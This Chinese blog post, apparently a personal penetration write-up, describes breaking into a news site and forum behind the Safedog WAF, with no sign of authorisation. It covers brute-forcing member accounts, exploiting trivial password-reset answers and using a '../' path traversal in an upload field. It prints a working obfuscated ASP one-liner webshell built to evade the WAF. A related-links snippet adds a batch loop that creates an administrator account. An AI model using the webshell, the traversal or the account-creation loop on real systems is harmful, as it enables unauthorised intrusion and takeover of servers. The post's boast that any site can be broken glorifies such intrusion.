0x01 信息收集

服务器信息: windows 2003 + IIS 6.0 + aspx . Php + 安全狗

站点cms信息:一套aspx新闻发布系统 和 Discuz X3

端口信息 : 服务器好像有拦截了, 探测不了 暂时先不看了 找下突破点。

0x02 寻找突破点

先明确下思路, 主站  – DZ论坛弱口令 getshell – 旁站 – 社工 – C段嗅探

先从主站 找下突破点 , 发布新闻 肯定会有上传点的 习惯性的扫一下。

没扫出什么东西 懒得放 WVS appcan 去扫了,手工找下敏感信息吧。

后台登录:http://www.xxoo.com/System/Login.aspx

会员中心:http://www.xxoo.com/user/login.aspx

有两处登陆的地方 后台弱口令 万能密码无果

去看一下会员中心 有个注册会员 好像是删除了,打不开

0x03 忘记密码找回突破

思路就快中断时候,灵光一闪 ,不是有个忘记密码么

注册不了 我们就来找回一个用户呗  说干就干

的确有admin 这个用户 试各种答案 都无果..

又蛋疼了.. 先静下心想想思路……………………………………………..

会员中心 会员中心 不就是有很多会员的么  不止一个用户 肯定有别的用户

设置一些傻瓜化问题!

打开 Burpsuite 爆破几个用户名来试试。

成功爆破到一个 用户 试试他的问题吧,

还真是傻瓜化问题 , 答案 就是问题 。 得到一个随机密码 登录之~

0x04 突破上传拿webshell

进到会员中心 发布新闻 找到这个上传点原本以为是Fckeditor 编辑器 可以秒杀 。

但是他用的不是原本的那个上传,这个上传点 什么东西都上传不了…

然后到处找啊找,,

还好找到一个可以上传的地方 附件上传  有上传就行~~上神器burp 截断试试。

本以为改成aspx 可以直接秒杀 ,, 但是404了.. 好吧 仔细看一下上传验证

—————————–7def81f240104

Content-Disposition: form-data; name="File_PicPath"

news|0

—————————–7def81f240104

File_PicPath 参数 应该可以改 news 是新闻的意思吧

应该是上传到指定上传新闻图片附件的目录~

我们把他改为 ../ 上一级目录试试。

的确是 打开试试

跳到上一级目录 秒杀之~  开开心心上传一句话~~

0x05 没遇到过的安全狗

上传菜刀本身的一句话,,没想到被安全狗拦截了 不过这个狗 第一次遇到。。

这种安全狗没遇到过… 不过找个中文一句话秒杀之~~

附上中文一句话:

<%

i=(Chr(-12590))

love=(Chr(-20306))

you=(Chr(-15133))

OK=i&love&you

CNM=Request(OK)

eVal CNM 'pass:我爱你

%>

密码:我爱你

本次渗透到此结束了,提权没空去提, 学生党伤不起 思路要淫荡 头脑要明确 !

总结一句话:不管你有什么拦截 只要你思路淫荡 没有你日不到的站。

常规渗透:没遇到过的anquan狗的更多相关文章

  1. web渗透学习目录

    一,基础学习 01.基础学习 [[编码总结]] [[JSON三种数据解析方法]] [[js加密,解密]] [[Internet保留地址和非保留地址.内网和公网.VNC和UltraVN]] 代理 [[S ...

  2. 13. CTF综合靶机渗透(六)

    靶机说明 Breach1.0是一个难度为初级到中级的BooT2Root/CTF挑战. VM虚机配置有静态IP地址(192.168.110.140),需要将虚拟机网卡设置为host-only方式组网,并 ...

  3. 渗透神器cobalt strike在数字杀软环境下的使用

    当我们拿到cobalt strike的beacon权限时,使用它如何渗透目标内网.因为我看网上的文章都是在无杀软下写的,这难免有点脱离实战环境,本文主要测试CS的beacon在数字杀软环境下进行常规渗 ...

  4. 内网渗透测试思路-FREEBUF

    (在拿到webshell的时候,想办法获取系统信息拿到系统权限) 一.通过常规web渗透,已经拿到webshell.那么接下来作重要的就是探测系统信息,提权,针对windows想办法开启远程桌面连接, ...

  5. 安全狗两个中危提权+NET提权

    1.循环加组复现 for /l %%i in (1,1,1000) do @net user admin admin /add&@ net localgroup administrators  ...

  6. 采集练习(十二) python 采集之 xbmc 酷狗电台插件

    前段时间买了个树莓派才知道有xbmc这么强大的影音软件(后来我逐渐在 电脑.手机和机顶盒上安装xbmc),在树莓派上安装xbmc后树莓派就成为了机顶盒,后面在hdpfans论坛发现了jackyspy  ...

  7. Centos Linux下使用Metasploit渗透android

    .newline{display:block}.katex .base{position:relative;white-space:nowrap;width:min-content}.katex .b ...

  8. 【扯淡篇】CTSC/APIO/SDOI R2时在干什么?有没有空?可以来做分母吗?

    注意: 我比较弱, 并没有办法把外链bgm搞成https, 所以大家可以选择"加载不安全的脚本"或者把https改成http以获得更好的阅读体验! 据说, 退役了要写写回忆录. 但 ...

  9. iptables看门狗

    近来业内很多服务器因redis造成服务器被黑,这个攻击的防范重点在于防火墙!! 有时为了方便我们可能会将iptables临时关闭,方便完倘若忘记把它打开,黑客大摇大摆就走进来. 这时候,我们需要条看门 ...

随机推荐

  1. Intel GPA 抓取3d模型

    原文链接在这里 http://dev.cra0kalo.com/?p=213 背景信息 Intel的GPA本身是一款图形分析软件,并没有设计从3D程序里抓取模型资源的功能,但这里作者是通过hook G ...

  2. Tcp参数优化

    net.core.netdev_max_backlog = 400000 #该参数决定了,网络设备接收数据包的速率比内核处理这些包的速率快时,允许送到队列的数据包的最大数目. net.core.opt ...

  3. oracle connect by用法

    先用scott用户下的emp表做实验.emp表有个字段,一个是empno(员工编号),另一个是mgr(上级经理编号)下面是表中所有数据 1 select * from emp start with e ...

  4. java/resteasy批量下载存储在阿里云OSS上的文件,并打包压缩

    现在需要从oss上面批量下载文件并压缩打包,搜了很多相关博客,均是缺胳膊少腿,要么是和官网说法不一,要么就压缩包工具类不给出 官方API https://help.aliyun.com/documen ...

  5. c++字符前面的L和_T

    字符串前面加L表示该字符串是Unicode字符串._T是一个宏,如果项目使用了Unicode字符集(定义了UNICODE宏),则自动在字符串前面加上L,否则字符串不变.因此,Visual C++里边定 ...

  6. 【response-下载文件步骤】

    Java中都通用文件下载(ContentType.文件头.response.out四步骤) 1.设置文件ContentType类型 2.设置文件头 3.通过response获取ServletOutpu ...

  7. svn在commit后报错:is scheduled for addition, but is missing

    今天通过svn 的cr(code review)代码审核后,我欲执行svn ci -m"xxxxxxx(提交注释) ISSUE=3380305",但是没有提交成功,SVN报错啦! ...

  8. 移动端Push推送

    移动端Push推送 移动端开发逃不掉要做推送,这里给出服务端一种省时省力的解决方案. iOS:PushSharp.Apple.苹果有自己的推送服务,我们按照规则推送数据就好.这里我选取PushShar ...

  9. MongoDB 学习(一)安装配置和简单应用

    一.安装和部署 1.服务端安装 1.官网下载(官方网站 https://www.mongodb.org/downloads/#production),傻瓜式安装,注意修改安装路径. 安装完成后的目录结 ...

  10. Java 集合类常用方法

    Collection中的contains()方法和remove()方法. boolean contains(Object o);该方法是用来判断集合中是否包含某个元素,若包含,返回true,不包含返回 ...